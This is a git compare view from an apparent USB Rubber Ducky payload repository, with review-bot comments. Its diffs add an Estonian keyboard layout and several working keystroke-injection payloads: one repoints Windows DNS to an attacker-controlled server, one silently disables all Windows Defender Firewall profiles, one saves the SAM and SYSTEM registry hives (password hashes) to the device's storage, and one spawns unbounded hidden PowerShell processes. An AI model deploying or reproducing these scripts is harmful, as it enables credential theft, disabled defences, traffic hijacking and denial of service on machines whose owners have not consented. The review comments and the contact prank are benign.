
24 Commits

Author SHA1 Message Date
&MF#CTg*fWz6H^nV d2725f40e6
Merge d23dc1884d into f3053273a4 2024-11-12 10:43:09 -05:00
Peaks f3053273a4
Merge pull request #493 from aleff-github/patch-95
Windows Spam Terminals
2024-11-08 06:24:15 -05:00
Peaks d5e02033fe
Merge pull request #498 from brunoooost/master
Adding RickRoll-Contact-iOS
2024-11-07 05:20:00 -05:00
bst04 b2b8cf8b2e changing category 2024-11-06 11:48:33 +01:00
Peaks 3333420b26
Merge pull request #497 from luu176/master
Deactivate/Disable Windows Firewall
2024-11-05 15:08:33 -05:00
bst04 8cd44e511c eliminate other payload 2024-11-04 15:03:31 +01:00
bst04 bad6fb6040 Adding Send-WhatsApp-Messages-MacOS to prank category 2024-11-04 15:02:21 +01:00
bst04 9c3f29df37 Adding RickRoll-Contact-iOS 2024-11-04 14:58:00 +01:00
Luu 3604620ab9
Create README.md 2024-11-04 13:00:57 +01:00
Luu 261e82a829
Create payload.txt 2024-11-04 13:00:31 +01:00
Peaks 5f13d6090f
Merge pull request #496 from luu176/master
DNS spoofer
2024-11-04 06:12:30 -05:00
Luu 1a1c79d5ba
Create payload.txt 2024-11-02 14:58:12 +01:00
Luu 203d986ae4
Create README.md 2024-11-02 14:57:52 +01:00
Peaks 6ae414c545
Merge pull request #495 from luu176/master
Exfiltrate NTLM hash files onto Rubber Ducky's SD card
2024-11-02 05:33:29 -04:00
Luu aeffdbfcbd
Delete payloads/library/execution/DNS_spoofer/payload.txt 2024-11-01 22:41:30 +01:00
Luu 9a5857b2af
Delete payloads/library/execution/DNS_spoofer/README.txt 2024-11-01 22:40:51 +01:00
Luu aa5afab7ed
Rename payload.txt to payload.txt 2024-11-01 15:42:11 +01:00
Luu f6fb02fe34
Create README.txt 2024-11-01 15:41:50 +01:00
Luu 0bb2f83a10
Create payload.txt 2024-11-01 15:32:44 +01:00
Luu 4a6e17773d
Update README.md 2024-10-31 12:58:23 +01:00
Luu 81ae8f0e8c
Create README.md 2024-10-31 12:56:53 +01:00
Luu 554b3066b7
Create payload.txt 2024-10-31 12:46:27 +01:00
Aleff 47fa68ecd9 Windows Spam Terminals 2024-10-31 08:16:18 +01:00
Hyperadministrator d23dc1884d Add estonian language 2024-10-28 16:38:10 +02:00
11 changed files with 745 additions and 0 deletions

173
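--- a/languages/ee.json
+++ b/languages/ee.json
@@ -0,0 +1,173 @@
+{
+"__comment": "All numbers here are in hex format and 0x is ignored.",
+"__comment": " ",
+"__comment": "This list is in ascending order of 3rd byte (HID Usage ID).",
+"__comment": " See section 10 Keyboard/Keypad Page (0x07)",
+"__comment": " of document USB HID Usage Tables Version 1.12.",
+"__comment": " ",
+"__comment": "Definition of these 3 bytes can be found",
+"__comment": " in section B.1 Protocol 1 (Keyboard)",
+"__comment": " of document Device Class Definition for HID Version 1.11",
+"__comment": " - byte 1: Modifier keys",
+"__comment": " - byte 2: Reserved",
+"__comment": " - byte 3: Keycode 1",
+"__comment": " ",
+"__comment": "Both documents can be obtained from link here",
+"__comment": " http://www.usb.org/developers/hidpage/",
+"__comment": " ",
+"__comment": "A = LeftShift + a, { = LeftShift + [",
+"__comment": " ",
+"0": "00,00,27",
+"1": "00,00,1e",
+"2": "00,00,1f",
+"3": "00,00,20",
+"4": "00,00,21",
+"5": "00,00,22",
+"6": "00,00,23",
+"7": "00,00,24",
+"8": "00,00,25",
+"9": "00,00,26",
+"CTRL": "01,00,00",
+"CONTROL": "01,00,00",
+"SHIFT": "02,00,00",
+"ALT": "04,00,00",
+"GUI": "08,00,00",
+"WINDOWS": "08,00,00",
+"COMMAND": "08,00,00",
+"a": "00,00,04",
+"A": "02,00,04",
+"b": "00,00,05",
+"B": "02,00,05",
+"c": "00,00,06",
+"C": "02,00,06",
+"d": "00,00,07",
+"D": "02,00,07",
+"e": "00,00,08",
+"E": "02,00,08",
+"f": "00,00,09",
+"F": "02,00,09",
+"g": "00,00,0a",
+"G": "02,00,0a",
+"h": "00,00,0b",
+"H": "02,00,0b",
+"i": "00,00,0c",
+"I": "02,00,0c",
+"j": "00,00,0d",
+"J": "02,00,0d",
+"k": "00,00,0e",
+"K": "02,00,0e",
+"l": "00,00,0f",
+"L": "02,00,0f",
+"m": "00,00,10",
+"M": "02,00,10",
+"n": "00,00,11",
+"N": "02,00,11",
+"o": "00,00,12",
+"O": "02,00,12",
+"p": "00,00,13",
+"P": "02,00,13",
+"q": "00,00,14",
+"Q": "02,00,14",
+"r": "00,00,15",
+"R": "02,00,15",
+"s": "00,00,16",
+"S": "02,00,16",
+"t": "00,00,17",
+"T": "02,00,17",
+"u": "00,00,18",
+"U": "02,00,18",
+"v": "00,00,19",
+"V": "02,00,19",
+"w": "00,00,1a",
+"W": "02,00,1a",
+"x": "00,00,1b",
+"X": "02,00,1b",
+"y": "00,00,1c",
+"Y": "02,00,1c",
+"z": "00,00,1d",
+"Z": "02,00,1d",
+"õ": "00,00,30",
+"Õ": "02,00,30",
+"ä": "00,00,34",
+"Ä": "02,00,34",
+"ö": "00,00,33",
+"Ö": "02,00,33",
+"ü": "00,00,2F",
+"Ü": "02,00,2F",
+"!": "02,00,1e",
+"@": "E6,00,1f",
+"#": "02,00,20",
+"$": "E6,00,21",
+"€": "E6,00,08",
+"£": "E6,00,20",
+"%": "02,00,22",
+"^": "E6,00,34",
+"&": "02,00,23",
+"*": "02,00,31",
+"(": "02,00,25",
+")": "02,00,26",
+"ENTER": "00,00,28",
+"ESC": "00,00,29",
+"ESCAPE": "00,00,29",
+"BACKSPACE": "00,00,2a",
+"TAB": "00,00,2b",
+"SPACE": "00,00,2c",
+" ": "00,00,2c",
+"-": "00,00,38",
+"_": "02,00,38",
+"=": "02,00,27",
+"+": "00,00,2d",
+"[": "E6,00,25",
+"{": "E6,00,24",
+"]": "E6,00,26",
+"}": "E6,00,27",
+"\\": "E6,00,2D",
+"|": "E6,00,38",
+";": "02,00,36",
+":": "02,00,37",
+"\"": "02,00,1f",
+"'": "00,00,31",
+"`": "E5,00,2E",
+"~": "02,00,35",
+",": "00,00,36",
+"<": "E6,00,36",
+".": "00,00,37",
+">": "E6,00,37",
+"/": "02,00,24",
+"?": "02,00,2D",
+"CAPSLOCK": "00,00,39",
+"F1": "00,00,3a",
+"F2": "00,00,3b",
+"F3": "00,00,3c",
+"F4": "00,00,3d",
+"F5": "00,00,3e",
+"F6": "00,00,3f",
+"F7": "00,00,40",
+"F8": "00,00,41",
+"F9": "00,00,42",
+"F10": "00,00,43",
+"F11": "00,00,44",
+"F12": "00,00,45",
+"PRINTSCREEN": "00,00,46",
+"SCROLLLOCK": "00,00,47",
+"PAUSE": "00,00,48",
+"BREAK": "00,00,48",
+"INSERT": "00,00,49",
+"HOME": "00,00,4a",
+"PAGEUP": "00,00,4b",
+"DELETE": "00,00,4c",
+"DEL": "00,00,4c",
+"END": "00,00,4d",
+"PAGEDOWN": "00,00,4e",
+"RIGHTARROW": "00,00,4f",
+"RIGHT": "00,00,4f",
+"LEFTARROW": "00,00,50",
+"LEFT": "00,00,50",
+"DOWNARROW": "00,00,51",
+"DOWN": "00,00,51",
+"UPARROW": "00,00,52",
+"UP": "00,00,52",
+"NUMLOCK": "00,00,53",
+"MENU": "00,00,65",
+"APP": "00,00,65"
+}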
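Review bot: Several entries put `E6` (and `E5` for the backtick) in the first byte, e.g. `"@": "E6,00,1f"`, but the file's own header defines byte 1 as the modifier bitmask, where the sibling entries use `01`/`02`/`04`/`08` and Right Alt (AltGr) would be bit 6, i.e. `40`. `E6` is the HID usage ID of Right Alt rather than a mask value, and read as a bitmask it asserts several modifiers at once. If AltGr is what is intended, these should look like `"@": "40,00,1f"`; the Estonian keycodes themselves are not verifiable from this page and need a check against a real host. Hex case is also mixed (`2F`, `2D`, `2E` against lowercase everywhere else).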


@ -0,0 +1,27 @@
# Spoof DNS - Windows ✅
DNS Spoofer
## Description
A payload used to alter the machines DNS settings, redirecting its DNS requests to an attacker-controlled server that can serve deceptive IP addresses for targeted domains.
### Settings
* Set the primary and secondary dns servers
## Credits
<h2 align="center"> Luu176 </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/luu176">
<img src="https://avatars.githubusercontent.com/u/112649910?v=4?raw=true" width="48" height="48" />
</a>
<br>Github
</td>
</tr>
</table>
</div>


@ -0,0 +1,69 @@
REM Title: DNS changer
REM Author: luu176
REM Description: Changes DNS address of windows machine in powershell
REM Target: Windows 10/11
REM wifi interface should be named: Wi-Fi
DEFINE #interface Ethernet
DEFINE #primaryDNS 192.168.1.3
DEFINE #secondaryDNS 1.1.1.1
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
SAVE_HOST_KEYBOARD_LOCK_STATE
GUI r
DELAY 150
STRINGLN powershell Start-Process powershell -Verb runAs
DELAY 800
ALT y
DELAY 500
STRINGLN Set-DnsClientServerAddress -InterfaceAlias "#interface" -ServerAddresses ("#primaryDNS", "#secondaryDNS"); exit
REM below is to blink the LED when payload done
VAR $i = 0
WHILE ( $i < 9 )
DELAY 150
CAPSLOCK
$i = ( $i + 1 )
END_WHILE
RESTORE_HOST_KEYBOARD_LOCK_STATE
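Review bot: The header says `REM wifi interface should be named: Wi-Fi` while `DEFINE #interface Ethernet` targets a different alias, so the comment and the default disagree about which adapter is changed; the comment should read something like `REM #interface must match the adapter alias (default: Ethernet)`. The PASSIVE_WINDOWS_DETECT extension sets `$_OS`, but nothing after `END_EXTENSION` reads it, so the keystrokes go to whatever host is attached; wrapping the body in the `IF ($_OS == WINDOWS) THEN … END_IF` form shown in the extension's own usage block keeps it off non-Windows machines, and the firewall, NTLM and terminal payloads later in this compare have the same gap. The DNS setting also persists after the run and neither the header nor the README says how to undo it; a line such as `REM Revert: Set-DnsClientServerAddress -InterfaceAlias "<alias>" -ResetServerAddresses` would cover that.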


@ -0,0 +1,23 @@
# Firewall Deactivator - Windows ✅
Deactivate firewall on windows
## Description
A payload used to deactivate all firewalls on windows in a discrete manner.
## Credits
<h2 align="center"> Luu176 </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/luu176">
<img src="https://avatars.githubusercontent.com/u/112649910?v=4?raw=true" width="48" height="48" />
</a>
<br>Github
</td>
</tr>
</table>
</div>


@ -0,0 +1,61 @@
REM Title: Firewall deactivator
REM Author: luu176
REM Description: Deactivate all firewalls in windows machine using hidden powershell
REM Target: Windows
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI r
DELAY 200
STRINGLN powershell -Command "Start-Process powershell -ArgumentList '-Command Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False' -Verb RunAs -WindowStyle Hidden"
DELAY 800
ALT y
SAVE_HOST_KEYBOARD_LOCK_STATE
VAR $i = 0
WHILE ( $i < 9 )
DELAY 150
CAPSLOCK
$i = ( $i + 1 )
END_WHILE
RESTORE_HOST_KEYBOARD_LOCK_STATE
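Review bot: The description `Deactivate all firewalls in windows machine` overstates what the `STRINGLN` line does: `Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False` only turns off the three Windows Defender Firewall profiles, and any third-party host firewall or network firewall is untouched. The header should also state that the host is left in that state, with the restore command `Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled True`. For anyone running or reviewing an engagement that uses this, it is worth documenting that the change is visible to defenders as a firewall-setting change in the Windows Firewall event log and as an elevated PowerShell started from the Run dialog.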


@ -0,0 +1,29 @@
# Exfiltrate NTLM Hash - Windows ✅
A Rubber Ducky payload to exfiltrate NTLM hash files from a Windows machine onto the SD card.
## Description
This payload script captures and <strong>exfiltrates NTLM hash files</strong> from a Windows machine. It uses PowerShell commands to locate and save the SAM and SYSTEM files, which contain hashed user passwords, <strong><u>onto the Rubber Ducky's SD card</u></strong> for later extraction and analysis. Upon successful file extraction, <strong> the payload triggers a visual confirmation by <u>blinking the Caps Lock LED</u> </strong>
### Settings
- **Drive Label:** Set the target drive label for Rubber Ducky storage (default: `DUCKY`).
- **Blink Count:** Adjust the number of Caps Lock LED blinks by setting the `#numBlinks` variable (default is 9 blinks).
## Credits
<h2 align="center"> Luu176 </h2>
<div align="center">
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/luu176">
<img src="https://avatars.githubusercontent.com/u/112649910?v=4" width="48" height="48" />
</a>
<br>GitHub
</td>
</tr>
</table>
</div>


@ -0,0 +1,81 @@
REM_BLOCK
TITLE Exfiltrate NTLM Hash Files onto Ducky Storage
AUTHOR Luu176
DESCRIPTION This payload exfiltrates NTLM hash files (which contain hashed passwords for users
on the current Windows device) to the Rubber Ducky's SD card for further analysis.
It utilizes PowerShell commands to locate and save NTLM files (SAM and SYSTEM) to
the defined storage drive on the Ducky device.
END_REM
DEFINE #driveLabel DUCKY
REM below you can set the number of blinks for the caps lock when finished (default 9)
DEFINE #numBlinks 9
ATTACKMODE HID STORAGE
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
SAVE_HOST_KEYBOARD_LOCK_STATE
IF ($_CAPSLOCK_ON == TRUE)
CAPSLOCK
END_IF
GUI d
DELAY 1000
GUI r
DELAY 500
STRINGLN powershell Start-Process powershell -Verb runAs
DELAY 800
ALT y
DELAY 800
STRINGLN cd (gwmi win32_volume -f 'label=''#driveLabel''').Name;reg save hklm\sam SAM;reg save hklm\system SYS;(New-Object -ComObject wscript.shell).SendKeys('{CAPSLOCK}');exit
GUI d
WAIT_FOR_CAPS_ON
REM once finished downloading SAM and SYSTEM, caps lock LED turn on and then flash (note: may take a couple minutes max to download)
VAR $i = 0
WHILE ( $i < #numBlinks )
DELAY 150
CAPSLOCK
$i = ( $i + 1 )
END_WHILE
RESTORE_HOST_KEYBOARD_LOCK_STATE
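Review bot: The header and README call SAM and SYSTEM `NTLM hash files`, but `reg save hklm\sam SAM;reg save hklm\system SYS` exports two registry hives, and the account hashes are only recoverable from SAM together with the boot key held in SYSTEM; the description should say that. The hives are written unencrypted to the volume labelled `#driveLabel`, so the SD card holds credential material afterwards and the README has no handling note, e.g. `REM Output files SAM and SYS contain credential material: store encrypted and wipe after the engagement`. `IF ($_CAPSLOCK_ON == TRUE)` omits the `THEN` that every other `IF` in this file uses. On the defensive side, `reg save` against `hklm\sam` from an elevated shell is a standard credential-dumping indicator (MITRE ATT&CK T1003.002) that process command-line logging records.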


@ -0,0 +1,66 @@
# Create RickRoll Contact - iOS
This payload is a prank script designed to create a contact named "Ricky Astley" (a nod to the "RickRoll" meme) on an iOS device. It utilizes a dynamic delay mechanism to ensure the system is ready before executing commands. The automated process opens the Contacts app, creates a new contact, and fills in various fields with predefined information: name, last name, phone number, email, website, and other optional details. The fake contact serves as a lighthearted prank, silently inserting a “RickRoll” in the form of a contact entry.
### Details
- **Title**: Create RickRoll Contact
- **Author**: bst04 - Aleff
- **Version**: 1.0
- **Category**: Prank
- **Target**: iOS devices
### Dependencies
- We believe that these 4 pieces of information are critical to making contact, even if it is for fun.
```
DEFINE #CONTACTS-APP-NAME Contacts
DEFINE #CONTACT-NAME Ricky
DEFINE #CONTACT-LAST-NAME Astley
DEFINE #CONTACT-PHONE-NUMBER +1(111)111-1111
```
- Other optional DEFINEs
```
DEFINE #CONTACT-COMPANY example
DEFINE #CONTACT-E-MAIL example
DEFINE #CONTACT-WEBSITE-URL example
DEFINE #CONTACT-BIRTHDAY example
DEFINE #CONTACT-STREET example
DEFINE #CONTACT-CITY example
DEFINE #CONTACT-STATE example
DEFINE #CONTACT-ZIP example
DEFINE #CONTACT-COUNTRY example
```
- Note that if you don't want to set some settings you have to remove the piece of code that sets it as well, for istance...
If you want to remove the zip contact info, you should change this one piece of code from this...
```
REM zip
DELAY 250
STRING #CONTACT-ZIP
TAB
```
... to this...
```
REM zip
DELAY 250
REM STRING #CONTACT-ZIP
TAB
```
In this way you are going to ignore this step but without altering the proper flow of available information.
### How It Works
1. Sets a user-defined options.
2. Uses an extension (`EXTENSION DETECT_READY`) to detect when the device is ready with just a littebit more delay...
3. After readiness is confirmed, the script:
- Runs commands to open **Contacts**.
- Executes some commands to sets the new contact information


@ -0,0 +1,135 @@
REM_BLOCK
############################################
# #
# Title : Create RickRoll Contact #
# Author : bst04 - Aleff #
# Version : 1.0 #
# Category : Prank #
# Target : iOS #
# #
############################################
END_REM
REM @@@ START MANDATORY DEFINEs @@@
REM We believe that these 4 pieces of information are critical to making contact, even if it is for fun.
DEFINE #CONTACTS-APP-NAME Contacts
DEFINE #CONTACT-NAME Ricky
DEFINE #CONTACT-LAST-NAME Astley
DEFINE #CONTACT-PHONE-NUMBER +1(111)111-1111
REM @@@ START OPTIONAL DEFINEs @@@
DEFINE #CONTACT-COMPANY example
DEFINE #CONTACT-E-MAIL example
DEFINE #CONTACT-WEBSITE-URL example
DEFINE #CONTACT-BIRTHDAY example
DEFINE #CONTACT-STREET example
DEFINE #CONTACT-CITY example
DEFINE #CONTACT-STATE example
DEFINE #CONTACT-ZIP example
DEFINE #CONTACT-COUNTRY example
REM @@@ START PAYLOAD @@@
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
REM Another pinch of delay in accordance with https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready
DELAY 200
GUI SPACE
DELAY 250
STRINGLN #CONTACTS-APP-NAME
DELAY 500
GUI n
REM name
DELAY 250
STRING #CONTACT-NAME
TAB
REM last name
DELAY 250
STRING #CONTACT-LAST-NAME
TAB
REM company
DELAY 250
STRING #CONTACT-COMPANY
TAB
REM phone number
DELAY 250
STRING #CONTACT-PHONE-NUMBER
TAB
TAB
REM mail
DELAY 250
STRING #CONTACT-E-MAIL
TAB
TAB
REM url
DELAY 250
STRING #CONTACT-WEBSITE-URL
TAB
TAB
REM birthday
DELAY 250
STRING #CONTACT-BIRTHDAY
TAB
TAB
REM street
DELAY 250
STRING #CONTACT-STREET
TAB
REM city
DELAY 250
STRING #CONTACT-CITY
TAB
REM state
DELAY 250
STRING #CONTACT-STATE
TAB
REM zip
DELAY 250
STRING #CONTACT-ZIP
TAB
REM country/region
DELAY 250
STRING #CONTACT-COUNTRY
TAB
GUI q
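Review bot: The field order is hard-coded as `TAB` counts (one after name, last name and company, two after phone, mail, url and birthday), which ties the payload to the new-contact form of one particular OS version and UI language, yet the header only says `Target : iOS`. Recording what it was tested on, e.g. `REM Tested on: <iOS version>, English UI`, would tell users when shifted fields are expected. The optional DEFINEs all default to `example`, so an unedited run types that literal word into every optional field; the README explains commenting out the `STRING` line, and a one-line REM under `REM @@@ START OPTIONAL DEFINEs @@@` pointing to that would help.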


@ -0,0 +1,23 @@
# Windows Spam Terminals
This script is designed to work on Windows devices. It opens an infinite number of PowerShell terminals, effectively spamming the system with terminal instances.
Be very careful about using this payload as this activity could alter the state of the computer by causing unsaved data to be lost. For this reason make sure you are authorized before running this script otherwise you may risk a loss of data.
### Details
- **Title**: Windows Spam Terminals
- **Author**: bst04 - Aleff
- **Version**: 1.0
- **Category**: Prank
- **Target**: Windows
### Dependencies
This payload is plug and play <3
## How It Works 📜
1. Uses an extension (`EXTENSION PASSIVE_WINDOWS_DETECT`) to detect when the device is ready
2. After readiness is confirmed, the script execute a powershell script that create an infinite number of PowerShell terminals


@ -0,0 +1,58 @@
REM_BLOCK
############################################
# #
# Title : Windows Spam Terminals #
# Author : bst04 - Aleff #
# Version : 1.0 #
# Category : Prank #
# Target : Windows #
# #
############################################
END_REM
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI r
DELAY 500
STRINGLN powershell -w h -Command "while ($true) { Start-Process powershell -ArgumentList '-NoExit', '-Command', 'Start-Process powershell -w h -ArgumentList \"-NoExit\", \"-Command\", \"Start-Process powershell -w h\"' }"
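Review bot: `Category : Prank` undersells what the `STRINGLN` line does: `while ($true) { Start-Process powershell … }` creates processes without bound, each of which starts further hidden PowerShell windows, which is a resource-exhaustion condition on the host. The README states the data-loss risk but the payload header does not; a line such as `REM Impact: unbounded process creation, host may become unresponsive and unsaved work can be lost` belongs in the header block. Recovery should be documented as well (sign out or reboot; as far as this hunk shows, the command writes nothing to disk and registers no persistence).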